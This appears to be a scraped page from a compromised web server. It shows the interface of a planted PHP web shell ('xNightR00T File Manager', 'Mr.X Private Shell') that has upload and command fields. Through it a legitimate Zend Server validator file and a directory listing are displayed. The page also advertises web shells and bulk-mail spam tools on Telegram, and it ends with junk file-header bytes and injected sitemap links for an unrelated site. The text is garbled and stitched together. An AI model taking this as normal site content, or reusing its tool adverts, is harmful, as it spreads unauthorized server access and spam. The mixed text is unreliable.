xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\Validator;

class ApiKeyName extends AbstractZendServerValidator
{
    const INVALID_NAME       = 'invalidName';
    const INVALID_CHARACTERS = 'invalidCharacters';
    const INVALID_WHITESPACE = 'invalidWhitspaces';

    protected $abstractOptions = array(
        'messageTemplates' => array(
            self::INVALID_NAME => "'%value%' is not a valid API name",
            self::INVALID_CHARACTERS => 'API names may not contain ()<>,;:\"/[]?={}%&|',
            self::INVALID_WHITESPACE => 'API names may not start or end with a white space',
        ),
        'translatorDisabled' => true,
        'valueObscured' => false,
        'messageVariables' => array()
    );

    /**
     * @param string $name
     * @return IpRange
     */
    public function setName($name)
    {
        $this->name = $name;
        return $this;
    }
    /* (non-PHPdoc)
     *
     * Based on the HTTP RFC use what the RFC defines as "token" characters, along with space and '@'.
     * This basically means all ASCII characters between 0x20 and 0x7e (including),
     * except for the following characters:
     * ( ) < > , ; : \ " / [ ] ? = { }
     * Also, it cannot begin or end with space.
     * We also, do not allow the following characters which complicate the name handling: %,&,|
     *
     * @see Zend_Validate_Interface::isValid()
     */

    public function isValid($value)
    {
        $this->setValue($value);
        $this->_messages = array();

        if (strlen($value) !== strcspn($value, '()<>,;:\"/[]?={}%&|')) {
            $this->error(self::INVALID_CHARACTERS);
            return false;
        }

        if (0 === preg_match('/^[\x20-\x7e]+$/', $value)) {
            $this->error(self::INVALID_NAME);
            return false;
        }

        if (1 === preg_match('/^(?:\s+.+)|(?:.+\s+)$/m', $value)) {
            $this->error(self::INVALID_WHITESPACE);
            return false;
        }

        return true;
    }

    protected function error($messageKey, $value = null)
    {
        return _t(parent::error($messageKey, $value));
    }
}

Filemanager

Name Type Size Permission Actions
File Folder 0755
AbsoluteUriPath.php File 1.1 KB 0644
AbstractZendServerValidator.php File 497 B 0644
ApiKeyName.php File 2.05 KB 0644
Boolean.php File 839 B 0644
DirectiveStringValidator.php File 886 B 0644
ErrorReporting.php File 1.39 KB 0644
FloatValidator.php File 836 B 0644
HostWithPort.php File 2.36 KB 0644
Integer.php File 810 B 0644
IpRange.php File 1.3 KB 0644
NullValidator.php File 273 B 0644
ServerProfileValidator.php File 4.06 KB 0644
UriPath.php File 1 KB 0644
Url.php File 683 B 0644
XmlStructure.php File 3.99 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml